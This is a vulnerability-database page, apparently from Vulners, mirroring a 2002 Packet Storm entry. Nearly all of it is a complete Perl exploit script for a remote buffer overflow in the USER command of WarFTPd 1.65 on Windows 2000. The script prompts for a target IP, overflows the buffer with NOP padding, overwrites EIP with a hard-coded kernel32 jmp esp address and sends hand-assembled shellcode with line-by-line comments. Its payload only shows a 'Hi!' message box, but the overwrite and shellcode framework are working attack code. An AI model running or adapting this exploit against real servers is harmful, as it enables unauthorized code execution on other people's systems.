Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

war-ftpd-bof.pl

🗓️ 29 May 2002 00:00:00Reported by KagoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Remote Buffer Overflow in WarFTPd 1.65 for Windows 2000 exploitation script by kago.

Code
`use IO::Socket;  
$port=21;  
$|=1;  
  
#Kernel32 jmp esp 7754a3ab  
#Kernel32 MessageBoxA 77e375d5  
#MSVCRT c_exit 78003985  
  
  
print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";  
print "\tEnter The Target IP :";  
  
$ip = <STDIN>;  
chomp $ip;  
  
  
  
$host = inet_aton($ip);  
$ServerAddr = sockaddr_in($port, $host);  
$protocol_name = "tcp";  
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));  
select(CLIENT); $|=1; select(STDOUT);  
if(connect(CLIENT, $ServerAddr)) {  
send(CLIENT,"user ",0);  
  
send(CLIENT,"\x90"x485,0); #485 nops to overwrite EIP  
send(CLIENT,"\xab\xa3\x54\x77",0); #Overwriting EIP with "jmp,esp" address via Kernel32.dll  
send(CLIENT,"\x90"x5,0); #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c  
  
send(CLIENT,"\x55",0); #push ebp - starting something new  
send(CLIENT,"\x8b\xec",0); #mov ebp,esp  
send(CLIENT,"\x33\xff",0); #xor edi,edi - edi = 0  
send(CLIENT,"\x57",0); #push edi   
  
send(CLIENT,"\xc6\x45\xfc\x48",0); #mov byte ptr [ebp-0x4],0x6f - H  
send(CLIENT,"\xc6\x45\xfd\x69",0); #mov byte ptr [ebp-0x3],0x78 - i  
send(CLIENT,"\xc6\x45\xfe\x21",0); #mov byte ptr [ebp-0x2],0x21 - !  
  
  
send(CLIENT,"\xba\xd5\x75\xe3\x77",0); #mov edx, 0x77e375d5 - MessageBoxA to edx  
send(CLIENT,"\x52",0); #push edx  
send(CLIENT,"\x57",0); #push edi  
send(CLIENT,"\x8d\x55\xfc",0); #lea edx,[ebp-0x4] - move Hi! to edx  
send(CLIENT,"\x52",0); #push edx  
send(CLIENT,"\x52",0); #push edx  
send(CLIENT,"\x52",0); #push edx  
  
send(CLIENT,"\x57",0); #push edi  
send(CLIENT,"\xff\x55\xf8",0); #call dword ptr [ebp-0x8]  
send(CLIENT,"\x55",0); #push ebp - Start the exit stuff so we don't crash  
send(CLIENT,"\x8b\xec",0); #move ebp,esp  
send(CLIENT,"\xba\x86\x41\x01\x89",0); #mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls  
send(CLIENT,"\x81\xea\x01\x08\x01\x11",0); #sub edx, 0x11010201 - My leet-o way to get to the address with the null  
send(CLIENT,"\x52",0); #push edx  
send(CLIENT,"\x33\xc0",0); #xor eax,eax  
send(CLIENT,"\x50",0); #push eax  
send(CLIENT,"\xff\x55\xfc",0); #call dword ptr [ebp-0x4]  
  
send(CLIENT,"\n",0);  
  
close(CLIENT);  
  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 May 2002 00:00Current
7.4High risk
Vulners AI Score7.4
warftpd exploit buffer overflow windows 2000 script kago
17